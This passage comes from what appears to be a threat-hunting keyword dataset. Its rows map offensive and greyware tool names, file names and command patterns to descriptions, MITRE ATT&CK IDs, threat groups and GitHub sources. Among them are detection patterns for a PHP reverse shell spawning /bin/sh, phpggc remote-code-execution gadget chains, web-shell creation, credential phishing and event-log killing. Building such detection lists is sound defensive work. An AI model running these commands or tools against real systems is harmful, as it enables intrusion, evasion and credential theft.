- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*phant0m-exe.*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m-master.zip*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*phant0m-rdll*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*phantom_thread * shc *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*PhantomService.csproj*,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - 
T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*PhantomService.exe*,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*phish_test.go*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*phish_windows_credentials.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Phish-Creds.ps1*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*phishery*,offensive_tool_keyword,phishery,Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.,T1566.001 - T1210 - T1565 - T1564.001,TA0002 - TA0007 - TA0010,N/A,N/A,Phishing,https://github.com/ryhanson/phishery,1,1,N/A,N/A,10,947,208,2017-09-11T15:42:10Z,2016-09-25T02:19:24Z -*phishing-HTML-linter.*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*phishlets *,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,0,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*phising_attack.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation 
tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*PhoenixMiner.exe*,greyware_tool_keyword,phoenix miner,Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage,T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089,TA0002 - TA0005 - TA0011 - TA0040 - TA0003,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PhoenixMiner_*_Windows\*,greyware_tool_keyword,phoenix miner,Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. 
The computer then slow down due to the high CPU and GPU usage,T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089,TA0002 - TA0005 - TA0011 - TA0040 - TA0003,N/A,N/A,Phishing,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*phoneinfoga scan -n *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PhoneInfoga*,offensive_tool_keyword,PhoneInfoga,An OSINT framework for phone numbers.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0010,N/A,N/A,Information Gathering,https://github.com/sundowndev/PhoneInfoga,1,0,N/A,N/A,10,10630,3054,2023-10-02T04:05:36Z,2018-10-25T09:19:47Z -*photon.py -u * -l 3 -t 100 --wayback*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*php -f *.php -- -o myShell.php*,offensive_tool_keyword,b374k,This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser,T1021 - T1028 - T1071 - T1105 - T1135,TA0002 - TA0003 - TA0005,N/A,N/A,Web Attacks,https://github.com/b374k/b374k,1,0,N/A,N/A,10,2248,783,2023-07-06T20:23:03Z,2014-01-09T04:43:32Z -*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*,greyware_tool_keyword,php,php reverse shell,T1071 - T1071.004 - T1021,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*php_filter_chain_generator --chain *php system*'cmd']*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*php_passthru_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*php_popen_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*php_proc_open_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*PHP-Code-injection.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*PHP-Code-Injections-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*phpggc -l*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*phpggc monolog/rce1 assert 'phpinfo()'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*phpggc symfony/rce1 id*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*phpmyadmin_credsteal.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PhpSploit*,offensive_tool_keyword,PhpSploit,Full-featured C2 framework which silently persists on webserver via evil PHP oneliner,T1059 - T1102 - T1053 - T1216 - T1027,TA0002 - TA0007 - TA0008,N/A,N/A,C2,https://github.com/nil0x42/phpsploit,1,1,N/A,10,10,2024,451,2023-08-23T13:08:08Z,2014-05-21T19:43:03Z -*phra/Pezor/*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*phuip-fpizdam*,offensive_tool_keyword,phuip-fpizdam,This is an exploit for a bug in php-fpm 
(CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).,T1190 - T1191 - T1192 - T1210 - T1059,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/neex/phuip-fpizdam,1,1,N/A,N/A,10,1767,261,2019-11-12T18:53:14Z,2019-09-23T21:37:27Z -*piata_ssh_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PIC-Exec*runshellcode.asm*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*PIC-Exec\addresshunter*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*PIC-Get-Privileges*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*-PID * -Assembly * -Arguments *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*ping -n 10 localhost > nul*,greyware_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*pingcastle*,offensive_tool_keyword,pingcastle,active directory weakness scan,T1018 - T1046 - T1069 - T1087 - T1136 - T1482 - T1526 - T1597,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.pingcastle.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PingCastle.cs*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,0,N/A,N/A,,N/A,,, -*PingCastle.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*ping-sweep*,offensive_tool_keyword,ping-sweep,Wrapper around the ping utility included by the OS. 
used for recon actiivities,T1016 - T1046,TA0007,N/A,N/A,Information Gathering,https://github.com/libresec/ping-sweep,1,0,N/A,N/A,1,1,0,2016-08-22T15:16:01Z,2016-08-22T02:07:46Z -*PinoyWH1Z/AoratosWin*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*PinoyWH1Z/AoratosWin*,offensive_tool_keyword,AoratosWin,AoratosWin A tool that removes traces of executed applications on Windows OS,T1070 - T1564,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*pip install exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pip install rarce*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*pip install --user fee,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*pip* install updog*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*pip3 install bofhound*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*pip3 install -U pacu*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*'pipename_stager'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*PipeViewer.csproj*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*PipeViewer_v1.1.zip*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*PipeViewer-main*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*pipx install fee,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*Pitty Tiger RAT*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*pivot_smb \*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*pivot_winrm *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 
